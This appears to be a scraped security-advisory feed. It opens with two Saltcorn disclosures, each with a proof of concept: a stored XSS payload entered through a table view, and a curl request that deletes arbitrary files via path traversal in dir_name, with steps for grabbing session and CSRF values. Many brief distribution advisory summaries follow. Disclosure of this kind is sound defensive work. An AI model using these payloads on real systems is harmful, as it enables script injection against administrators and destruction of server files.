The following PoC demonstrates how a non-admin user with permission to read/write on a table can inject malicious javascript code that will be executed in the event log admin panel if event logs are enabled.

To demonstrate this issue, we need to prepare some components. The following steps should be executed with an admin user.

1. create a table with one column of type string and set read/write permission to staff users (just as an example)
   - visit `http://localhost:3000/table/new`
   - create a table with `Table name` `my_table_xss` and click `Create`
   - click `Add field` to add a field with `Label` called `payload` of type `String` and click `Next >>`
   - leave default values for `Attributes` and click `Next >>`
   - it should redirect to `http://localhost:3000/table/<table-number>`
   - under `Edit table properties`, set `Minimum role to read` and `Minimum role to write` to `staff`
2. create an edit view so that staff users can insert more data
   - visit `http://localhost:3000/viewedit` and click `Create View`
   - set the following values:
     - `View name`: `my_xss_view`
     - `View pattern`: `Edit`
     - `Table`: `my_table_xss`
     - `Minimum role`: `staff`
   - click `Configure >>`
   - on page `http://localhost:3000/viewedit/config/my_xss_view` click `Next >>` and then `Finish >>`
   - you should see a message `View my_xss_view saved`
3. edit the site structure to add the View just created so that `staff` users can access it
   - visit `http://localhost:3000/menu`
   - set the following values:
     - `Type`: `View`
     - `View`: `my_xss_view [Edit]`
     - `Text label`: `view`
     - `Minimum role`: `staff`
   - click `Add`
4. create an event that will log when data is inserted in the `my_table_xss` table created at step 1
   - visit `http://localhost:3000/eventlog/settings`
   - under `Which events should be logged?` select:
     - `[X] Insert`
     - `[X] Insert my_table_xss`

Login with a user with staff role (you can do the same steps also with an admin user):

- visit `http://localhost:3000/view/my_xss_view`
- in the `payload` field insert ``"<svg/onload=alert(`xss`)>`` and click `Save`

With an admin user inspect the log entry generated by the above action:

- visit `http://localhost:3000/eventlog`
- click on the event log generated (`http://localhost:3000/eventlog/<event-number>`)
- an alert will appear

### Impact

Stored Cross-Site Scripting (XSS)

### Recommended Mitigation

Sanitize the user input before building HTML elements

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PF56-H9QF-RXQ4
07.10.2024 22:37:48 | npm | [NPM:GHSA-43F3-H63W-P6F6] Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability (high)

### Summary

A logged-in user with any role can delete arbitrary files on the filesystem by calling the `sync/clean_sync_dir` endpoint. The `dir_name` POST parameter is not validated/sanitized and is used to construct the `syncDir` that is deleted by calling `fs.rm`.

### Details

- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346

```js
router.post(
  "/clean_sync_dir",
  error_catcher(async (req, res) => {
    const { dir_name } = req.body; // [1] source
    try {
      const rootFolder = await File.rootFolder();
      const syncDir = path.join(
        rootFolder.location,
        "mobile_app",
        "sync",
        dir_name // [2]
      );
      await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink
      res.status(200).send("");
    } catch (error) {
      getState().log(2, `POST /sync/clean_sync_dir: '${error.message}'`);
      res.status(400).json({ error: error.message || error });
    }
  })
);
```

### PoC

The following PoC can be executed with a user with any role (`admin`, `staff`, `user`, `public`)

- create a file in a folder different from where the server is started:

```
touch /tmp/secret
cat /tmp/secret
```

- log in with a user and retrieve valid `connect.sid` and `_csrf` values***
- send the following `curl` request

```
curl -i -X $'POST' \
  -H $'Host: localhost:3000' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -H $'Content-Length: 93' \
  -H $'Origin: http://localhost:3000' \
  -H $'Connection: close' \
  -b $'connect.sid=VALID_CONNECT_SID_COOKIE; loggedin=true' \
  --data-binary $'_csrf=VALID_CSRF_VALUE&dir_name=/../../../../../../../../../../tmp/secret' \
  $'http://localhost:3000/sync/clean_sync_dir'
```

- check if the file previously created does not exist anymore:

```
cat /tmp/secret
cat: /tmp/secret: No such file or directory
```

*** obtain `connect.sid` and `_csrf` values

A possible way to retrieve `connect.sid` and `_csrf` values is to use the password reset functionality:

- log in
- open the browser developer console, go to the `Network` tab and filter for the `settings` request
- visit `http://localhost:3000/auth/settings`
- trigger the change password functionality
- under the `Headers` and `Request` tabs, grab the `connect.sid` and `_csrf` values and replace them in the curl command

### Impact

Arbitrary file delete

### Recommended Mitigation

Resolve the `syncDir` and check if it starts with `rootFolder.location/mobile_app/sync`.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-43F3-H63W-P6F6
07.10.2024 15:16:34 | suse | [SUSE-SU-2024:3538-1] Security update for mozjs115 (moderate) | Security update for mozjs115 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3538-1
07.10.2024 15:16:17 | suse | [SUSE-SU-2024:3537-1] Security update for redis7 (important) | Security update for redis7 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3537-1
07.10.2024 14:29:03 | ubuntu | [USN-7057-1] WEBrick vulnerability | WEBrick could allow a HTTP request smuggling attack. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7057-1
09.10.2024 04:31:01 | fedora | [FEDORA-2024-aaa468ae4f] Fedora 40: perl-App-cpanminus (critical) | Patch the code to use https instead of http (CVE-2024-45321) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-aaa468ae4f
09.10.2024 04:31:00 | fedora | [FEDORA-2024-326390f033] Fedora 40: logiops (high) | Fixes CVE-2024-45752: A vulnerability that allows users to remap keys arbitrarily. This allows all users on the system to remap a key unexpectedly to a potentially malicious sequence | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-326390f033
09.10.2024 03:47:07 | fedora | [FEDORA-2024-78e43b4de6] Fedora 39: perl-App-cpanminus (critical) | Patch the code to use https instead of http (CVE-2024-45321) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-78e43b4de6
09.10.2024 03:47:06 | fedora | [FEDORA-2024-69ce052378] Fedora 39: logiops (high) | Fixes CVE-2024-45752: A vulnerability that allows users to remap keys arbitrarily. This allows all users on the system to remap a key unexpectedly to a potentially malicious sequence | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-69ce052378
09.10.2024 03:18:18 | fedora | [FEDORA-2024-6ecf5236ae] Fedora 41: p7zip | Fix wrapper to hide password from process history | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6ecf5236ae
09.10.2024 03:17:52 | fedora | [FEDORA-2024-851219f5e3] Fedora 41: crosswords (medium) | Update to 0.3.13.3 and fix gresource generation | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-851219f5e3
09.10.2024 03:17:47 | fedora | [FEDORA-2024-ef9db8b16d] Fedora 41: perl-App-cpanminus (critical) | Patch the code to use https instead of http (CVE-2024-45321) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ef9db8b16d
09.10.2024 03:17:41 | fedora | [FEDORA-2024-1a9b10c921] Fedora 41: logiops (high) | Fixes CVE-2024-45752: A vulnerability that allows users to remap keys arbitrarily. This allows all users on the system to remap a key unexpectedly to a potentially malicious sequence | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1a9b10c921
08.10.2024 22:17:19 | ubuntu | [USN-7058-1] .NET vulnerabilities | Several security issues were fixed in dotnet6, dotnet8. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7058-1
09.10.2024 01:23:12 | maven | [MAVEN:GHSA-JQH2-CH7P-XWXH] Quarkus CXF logs passwords and other secrets (moderate) | A vulnerability was found in Quarkus CXF. Passwords and other secrets may appear in the application log in spite of the user configuring them to be hidden. This issue requires some special configuration to be vulnerable, such as SOAP logging enabled, application set client, and endpoint logging properties, and the attacker must have access to the application log. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JQH2-CH7P-XWXH
09.10.2024 01:23:07 | maven | [MAVEN:GHSA-5WPR-CJ9P-959R] HTTP Request Smuggling Leading to Client Timeouts in resteasy-netty4 (moderate) | A vulnerability was found in the resteasy-netty4 library arising from improper handling of HTTP requests using smuggling techniques. When an HTTP smuggling request with an ASCII control character is sent, it causes the Netty HttpObjectDecoder to transition into a BAD_MESSAGE state. As a result, any subsequent legitimate requests on the same connection are ignored, leading to client timeouts, which may impact systems using load balancers and expose them to risk. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5WPR-CJ9P-959R
08.10.2024 19:35:10 | ubuntu | [USN-7057-2] WEBrick vulnerability | WEBrick could allow a HTTP request smuggling attack. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7057-2
08.10.2024 22:19:01 | pypi | [PYSEC-2024-102] django vulnerability | An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-102
08.10.2024 18:10:23 | suse | [SUSE-SU-2024:3553-1] Security update for the Linux Kernel (important) | Security update for the Linux Kernel | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3553-1
08.10.2024 18:04:21 | suse | [SUSE-SU-2024:3552-1] Security update for pgadmin4 (moderate) | Security update for pgadmin4 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3552-1
08.10.2024 18:03:16 | suse | [SUSE-SU-2024:3551-1] Security update for the Linux Kernel (important) | Security update for the Linux Kernel | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3551-1
08.10.2024 17:18:02 | ubuntu | [USN-7014-2] nginx vulnerability | nginx could be made to crash if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7014-2
08.10.2024 17:07:52 | suse | [SUSE-SU-2024:3550-1] Security update for podofo (moderate) | Security update for podofo | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3550-1
08.10.2024 17:07:20 | suse | [SUSE-SU-2024:3549-1] Security update for redis7 (important) | Security update for redis7 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3549-1
08.10.2024 17:06:54 | suse | [SUSE-SU-2024:3548-1] Security update for Mesa (moderate) | Security update for Mesa | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3548-1
08.10.2024 17:06:33 | suse | [SUSE-SU-2024:3547-1] Security update for the Linux Kernel (important) | Security update for the Linux Kernel | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3547-1
08.10.2024 17:04:51 | suse | [SUSE-SU-2024:3546-1] Security update for podman (moderate) | Security update for podman | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3546-1
08.10.2024 17:04:20 | suse | [SUSE-SU-2024:3545-1] Security update for buildah (moderate) | Security update for buildah | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3545-1
08.10.2024 17:04:05 | suse | [SUSE-SU-2024:3544-1] Security update for Mesa (moderate) | Security update for Mesa | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3544-1
08.10.2024 16:33:36 | suse | [SUSE-SU-2024:3543-1] Security update for json-lib (moderate) | Security update for json-lib | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3543-1
08.10.2024 11:33:37 | suse | [SUSE-SU-2024:3541-1] Security update for podofo (moderate) | Security update for podofo | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3541-1
08.10.2024 11:30:23 | suse | [SUSE-SU-2024:3540-1] Security update for Mesa (moderate) | Security update for Mesa | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3540-1
08.10.2024 17:38:54 | npm | [NPM:GHSA-PR45-CG4X-FF4M] ggit is vulnerable to Arbitrary Argument Injection via the clone() API (moderate) | All versions of the package ggit are vulnerable to Arbitrary Argument Injection via the clone() API, which allows specifying the remote URL to clone and the file on disk to clone to. The library does not sanitize for user input or validate a given URL scheme, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PR45-CG4X-FF4M
08.10.2024 17:38:50 | npm | [NPM:GHSA-62CX-5XJ4-WFM4] ggit is vulnerable to Command Injection via the fetchTags(branch) API (moderate) | All versions of the package ggit are vulnerable to Command Injection via the fetchTags(branch) API, which allows user input to specify the branch to be fetched and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-62CX-5XJ4-WFM4
08.10.2024 17:37:56npm[NPM:GHSA-6339-GV7W-G5F4] SAP HANA Node.js client package vulnerable to Prototype Pollution (moderate)The SAP HANA Node.js client package versions from 2.0.0 before 2.21.31 are impacted by a Prototype Pollution vulnerability allowing an attacker to add arbitrary properties to global object prototypes. This is due to improper user input sanitization when using the nestTables feature, causing low impact on the availability of the application. This has no impact on Confidentiality and Integrity.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6339-GV7W-G5F4
09.10.2024 02:13:59rustsec[RUSTSEC-2024-0377] Heap Buffer overflow using c_chars_to_str functionThe `heap-buffer-overflow` is triggered in the `strlen()` function when handling the `c_chars_to_str` function in the dbn crate. This vulnerability occurs because the `CStr::from_ptr()` function in Rust assumes that the provided C string is null-terminated. However, there is no guarantee that the input chars array passed to the c_chars_to_str function is properly null-terminated. If the chars array does not contain a null byte (\0), strlen() will continue to read beyond the bounds of the buffer in search of a null terminator. This results in an out-of-bounds memory read and can lead to a heap-buffer-overflow, potentially causing memory corruption or exposing sensitive information.https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0377
08.10.2024 21:50:10npm[NPM:GHSA-QVQV-MCXR-X8QW] Slim Select has potential Cross-site Scripting issue (low)Slim Select 2.0 versions through 2.9.0 are affected by a potential cross-site scripting vulnerability. In select.ts:createOption(), the text variable from the user-provided Options object is assigned to an innerHTML without sanitization. Software that depends on this library to dynamically generate lists using unsanitized user-provided input may be vulnerable to cross-site scripting, resulting in attacker-executed JavaScript. At this time, no patch is available.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QVQV-MCXR-X8QW
08.10.2024 20:22:06pypi[PYSEC-2024-100] openc3 vulnerabilityOpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. The login functionality contains a reflected cross-site scripting (XSS) vulnerability. This vulnerability is fixed in 5.19.0. Note: This CVE only affects Open Source Edition, and not OpenC3 COSMOS Enterprise Edition.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-100
08.10.2024 20:22:06pypi[PYSEC-2024-101] openc3 vulnerabilityOpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. A path traversal vulnerability inside of LocalMode's open_local_file method allows an authenticated user with adequate permissions to download any .txt via the ScreensController#show on the web server COSMOS is running on (depending on the file permissions). This vulnerability is fixed in 5.19.0.https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-101
08.10.2024 21:56:11npm[NPM:GHSA-GJ3P-J74V-3X57] ReLaXed Cross-site Scripting vulnerability (low)A vulnerability classified as problematic has been found in RelaxedJS ReLaXed up to 0.2.2. Affected is an unknown function of the component Pug to PDF Converter. The manipulation leads to cross site scripting. An attack has to be approached locally. The exploit has been disclosed to the public and may be used.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GJ3P-J74V-3X57
10.10.2024 11:26:17ubuntu[USN-7022-3] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7022-3
10.10.2024 06:41:37ubuntu[USN-7060-1] EDK II vulnerabilitiesSeveral security issues were fixed in EDK II.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7060-1
10.10.2024 05:00:48fedora[FEDORA-2024-7ee01adadc] Fedora 40: kojiUpdate to 1.35.1. Includes fix for CVE-2024-9427https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7ee01adadc
10.10.2024 05:00:34fedora[FEDORA-2024-051cf1553e] Fedora 40: xenx86: Deadlock in vlapic_error() [XSA-462, CVE-2024-45817]https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-051cf1553e
10.10.2024 03:51:05fedora[FEDORA-2024-020dbf247c] Fedora 39: xenx86: Deadlock in vlapic_error() [XSA-462, CVE-2024-45817]update to xen-4.17.5https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-020dbf247c
10.10.2024 03:18:41fedora[FEDORA-2024-d85494e836] Fedora 41: firefoxUpdated to latest upstream (131.0.2)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d85494e836
10.10.2024 03:18:21fedora[FEDORA-2024-92d80d7f9a] Fedora 41: webkit2gtk4.0 (high)Update to 2.46.1https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-92d80d7f9a
10.10.2024 03:18:17fedora[FEDORA-2024-a5d6cd9f0a] Fedora 41: unbound (medium)Fixed builds on F41. Fixes CVE-2024-8508 https://github.com/NLnetLabs/unbound/releases/tag/release-1.21.1https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a5d6cd9f0a
10.10.2024 03:17:45fedora[FEDORA-2024-60809cb44e] Fedora 41: xenx86: Deadlock in vlapic_error() [XSA-462, CVE-2024-45817]https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-60809cb44e
10.10.2024 00:27:44slackware[SSA:2024-283-01] mozilla-firefoxNew mozilla-firefox packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-firefox-115.16.1esr-i686-1_slack15.0.txz: Upgraded.
  This update contains a critical security fix:
  Use-after-free in Animation timeline.
  "An attacker was able to achieve code execution in the content process by
  exploiting a use-after-free in Animation timelines. We have had reports of
  this vulnerability being exploited in the wild."
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.16.1/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-51/
    https://www.cve.org/CVERecord?id=CVE-2024-9680
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.16.1esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.16.1esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.3.1esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.3.1esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
00c7a2a509f6c85744070daf20b07781  mozilla-firefox-115.16.1esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
b6c3a0f2b962619b7dcc94fc5c837d4c  mozilla-firefox-115.16.1esr-x86_64-1_slack15.0.txz

Slackware -current package:
5a2ff4e9f83f0e27c62986729855b27d  xap/mozilla-firefox-128.3.1esr-i686-1.txz

Slackware x86_64 -current package:
f3e0b28a1ba03c47e0a627dfa9326c5b  xap/mozilla-firefox-128.3.1esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.16.1esr-i686-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-283-01
09.10.2024 19:55:21suse[SUSE-SU-2024:3575-1] Security update for redis (important)Security update for redishttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3575-1
09.10.2024 18:01:53ubuntu[USN-7059-1] OATH Toolkit vulnerabilityoath-toolkit could be made to overwrite files as the administrator.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7059-1
09.10.2024 16:28:57suse[SUSE-SU-2024:3570-1] Security update for cups-filters (critical)Security update for cups-filtershttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3570-1
09.10.2024 18:26:14maven[MAVEN:GHSA-JQFV-JRVQ-95JM] Apache XML Graphics FOP XML External Entity Reference ('XXE') vulnerability (moderate)Improper Restriction of XML External Entity Reference ('XXE') vulnerability in Apache XML Graphics FOP. This issue affects Apache XML Graphics FOP: 2.9. Users are recommended to upgrade to version 2.10, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JQFV-JRVQ-95JM
09.10.2024 15:00:34ubuntu[USN-7043-4] cups-filters vulnerabilitiescups-filters could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-4
09.10.2024 14:55:23ubuntu[USN-7042-2] cups-browsed vulnerabilitycups-browsed could be made to run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7042-2
09.10.2024 14:52:12suse[SUSE-SU-2024:3569-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3569-1
09.10.2024 12:46:04suse[SUSE-SU-2024:3567-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3567-1
09.10.2024 12:43:40suse[SUSE-SU-2024:3566-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3566-1
09.10.2024 12:40:48suse[SUSE-SU-2024:3565-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3565-1
09.10.2024 12:09:06suse[SUSE-SU-2024:3564-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3564-1
09.10.2024 12:04:25suse[SUSE-SU-2024:3563-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3563-1
09.10.2024 11:45:13suse[SUSE-SU-2024:3561-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3561-1
09.10.2024 11:19:18suse[SUSE-SU-2024:3559-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3559-1
09.10.2024 09:17:10suse[SUSE-SU-2024:3554-1] Security update for mozjs78 (moderate)Security update for mozjs78https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3554-1
09.10.2024 11:55:36almalinux[ALSA-2024:7699] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7699
09.10.2024 11:57:20almalinux[ALSA-2024:7700] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7700
10.10.2024 02:46:56npm[NPM:GHSA-JJ78-5FMV-MV28] Express Open Redirect vulnerability (low)URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Express. This vulnerability affects the use of the Express Response object. This issue impacts Express: from 3.4.5 before 4.0.0-rc1.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JJ78-5FMV-MV28
09.10.2024 11:59:28almalinux[ALSA-2024:7457] mod_jk bug fix update (moderate)mod_jk bug fix updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7457
11.10.2024 12:09:33ubuntu[USN-7020-4] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-4
11.10.2024 01:46:30slackware[SSA:2024-284-01] mozilla-thunderbirdNew mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.16.0esr/releasenotes/
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.16.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-128.3.1esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-128.3.1esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
3932f71bbd08c2fa52e525f01751da0e  mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
99d66a23352c22066048dadfeed4c4a0  mozilla-thunderbird-115.16.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
1a10587221395fdc1617003e553e3fec  xap/mozilla-thunderbird-128.3.1esr-i686-1.txz

Slackware x86_64 -current package:
c6613d1a758d1115da027dd46a072b64  xap/mozilla-thunderbird-128.3.1esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.16.0esr-i686-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-284-01
11.10.2024 00:29:10fedora[FEDORA-2024-db72f480e8] Fedora 40: firefoxNew upstream version (131.0.2)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-db72f480e8
11.10.2024 00:27:32fedora[FEDORA-2024-f109ae6fc7] Fedora 39: firefoxUpdated to latest upstream (131.0.2)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f109ae6fc7
10.10.2024 19:03:49suse[SUSE-SU-2024:3592-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3592-1
10.10.2024 18:34:34suse[SUSE-SU-2024:3591-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3591-1
10.10.2024 16:29:54suse[SUSE-SU-2024:3587-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3587-1
10.10.2024 15:55:01ubuntu[USN-7061-1] Go vulnerabilitiesSeveral security issues were fixed in Go.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7061-1
10.10.2024 15:06:46ubuntu[USN-7062-1] libgsf vulnerabilitieslibgsf could be made to run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7062-1
10.10.2024 14:29:45suse[SUSE-SU-2024:3586-1] Security update for xen (important)Security update for xenhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3586-1
10.10.2024 12:05:14suse[SUSE-SU-2024:3585-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3585-1
11.10.2024 00:00:06npm[NPM:GHSA-434G-2637-QMQR] Elliptic's verify function omits validation (low)The Elliptic package 6.5.5 for Node.js for EDDSA implementation does not perform the required check if the signature proof(s) is within the bounds of the order n of the base point of the elliptic curve, leading to signature malleability. Namely, the `verify` function in `lib/elliptic/eddsa/index.js` omits `sig.S().gte(sig.eddsa.curve.n) || sig.S().isNeg()` validation. This vulnerability could have a security-relevant impact if an application relies on the uniqueness of a signature.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-434G-2637-QMQR
10.10.2024 14:24:01almalinux[ALSA-2024:7848] openssl security update (low)openssl security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7848
10.10.2024 14:22:19almalinux[ALSA-2024:7851] .NET 6.0 security update (important).NET 6.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7851
10.10.2024 14:20:14almalinux[ALSA-2024:7868] .NET 8.0 security update (important).NET 8.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7868
12.10.2024 04:52:15fedora[FEDORA-2024-f71b7dad10] Fedora 39: mosquittoUpdate to 2.0.19https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f71b7dad10
12.10.2024 04:52:11fedora[FEDORA-2024-68f9c0741f] Fedora 39: redis (high)Redis Community Edition 7.2.6 Released Wed 02 Oct 2024 20:17:04 IDT. Upgrade urgency SECURITY: See security fixes below. Security fixes: CVE-2024-31449 Lua library commands may lead to stack overflow and potential RCE. CVE-2024-31227 Potential Denial-of-service due to malformed ACL selectors. CVE-2024-31228 Potential Denial-of-service due to unbounded pattern matching.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-68f9c0741f
12.10.2024 04:52:09fedora[FEDORA-2024-8831059030] Fedora 39: python-cramjam, rust-brotli, rust-nu-command, rust-brotli-decompressor, rust-libcramjam0.2 & 4 moreUpdate rust-brotli-decompressor to 4.0.1, rust-brotli to 7.0.0, and rust-async-compression to 0.4.13. Patch dependent packages as needed to avoid compat packages. Rebuild with the latest Rust crate dependency versions; fix automatic provides on Python extension due to SONAME when built with Rust 1.81 or later.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8831059030
